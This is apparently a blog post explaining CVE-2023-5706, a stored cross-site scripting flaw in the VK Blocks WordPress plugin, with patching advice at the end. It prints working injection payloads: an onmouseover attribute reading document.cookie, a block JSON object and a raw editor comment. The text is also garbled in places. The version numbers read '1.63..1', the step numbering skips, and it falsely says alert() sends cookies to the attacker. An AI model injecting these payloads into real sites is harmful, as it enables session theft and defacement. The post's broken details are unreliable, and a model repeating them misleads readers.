CVE-2023-5706 - How VK Blocks Plugin for WordPress Exposes Your Site to Stored XSS Attacks

WordPress is the world’s most popular content management system, but its popularity also makes it a massive target for hackers. Whenever a plugin has a security flaw, the results can impact thousands of websites worldwide. One recent example is CVE-2023-5706, a vulnerability in the VK Blocks plugin that allows attackers to inject malicious scripts into your WordPress pages.

This guide will break down what CVE-2023-5706 is, demonstrate how the exploit works with clear code examples, discuss which versions are at risk, and close with advice on keeping your site safe. Let’s dive in.

What is CVE-2023-5706?

CVE-2023-5706 is a critical vulnerability found in the VK Blocks plugin for WordPress, version 1.63..1 and earlier. It affects all versions up to and including 1.63..1. The vulnerability is in the plugin’s vk-blocks/ancestor-page-list block, which fails to properly sanitize or escape user-supplied attributes.

What’s Possible?

- Attackers can inject their own JavaScript code ("Stored Cross-Site Scripting" or XSS) into pages using the vulnerable block.
- The malicious script runs in every visitor’s browser who loads the compromised page, leading to things like stolen logins, hijacked sessions, or defaced content.

How Does the Exploit Work?

At the heart of this vulnerability is how the plugin handles user input. A contributor or higher can edit a post/page and add a VK Blocks block. If they inject a special payload as an attribute, the plugin inserts it into the page without checking or encoding it. When the page loads, so does the attacker's script.

Here's a simplified version of the vulnerable code

// Hypothetical render code in the plugin
function render_ancestor_page_list( $attributes ) {
    // No proper sanitization or escaping!
    $custom_class = $attributes['className'];
    return '<div class="' . $custom_class . '"> ... </div>';
}

A malicious actor could set className to

className="foo" onmouseover="alert(document.cookie)"

This turns the rendered HTML into

<div class="foo" onmouseover="alert(document.cookie)"> ... </div>

Whenever a visitor moves their mouse over the block, their cookies would be sent to the attacker. The code inside the double quotes is executed as JavaScript.

Example Exploit: Step-by-step

Let’s go through a simple, practical exploitation path.

2. Adds a VK Blocks ancestor-page-list block.

### 3. Sets a malicious attribute (e.g., using block editor's "Additional CSS class" feature or directly editing block HTML):

{
  "blockName": "vk-blocks/ancestor-page-list",
  "attrs": {
    "className": "\" onmouseover=\"alert('XSS by CVE-2023-5706')"
  },
  "innerBlocks": []
}

Example in WordPress block editor (raw)

<!-- wp:vk-blocks/ancestor-page-list {"className":"\" onmouseover=\"alert('XSS!')"} /-->

6. The result: when any user moves their mouse over the list, they see a popup.

This is a benign example, but a real attacker could steal session cookies, deface the site, or redirect users to malicious domains.

Why is This So Dangerous?

- Stored XSS is persistent—once injected, the script runs for every user who visits the page until it’s removed.

Which Versions Are Vulnerable?

All versions of VK Blocks up to and including 1.63..1.

As of this writing, the official plugin page lists newer versions that close the gap. Always check the changelog for security patches.

Official Reference Links

- NIST NVD: CVE-2023-5706
- Wordfence Advisory
- VK Blocks on WordPress.org

How do you protect your site?

1. Update VK Blocks immediately to the latest version. Version 1.63..2 and above are believed to be patched.
2. Review your users. Remove or lower contributors you do not trust or use a plugin to restrict who can use specific blocks.

Final Thoughts

CVE-2023-5706 is a textbook case of how small input validation lapses can lead to serious security holes. If you use VK Blocks on your WordPress site, update it *now*. If you run any community or multi-user site, stay vigilant about plugin vulnerabilities. Stored XSS is not just a technical detail—it puts your users and business at real risk.

If you want to experiment with security safely, always do so in a test environment. Never try exploiting real sites without permission.

Stay Secure

- Patch your plugins.
- Watch for new vulnerabilities.
- Learn about XSS and web security.

If you want more exclusive WordPress security breakdowns, follow this blog for updates!

*This post is original and made for clarity—feel free to share to keep your site safe!*

Timeline

Published on: 11/22/2023 16:15:14 UTC
Last modified on: 12/02/2023 00:23:17 UTC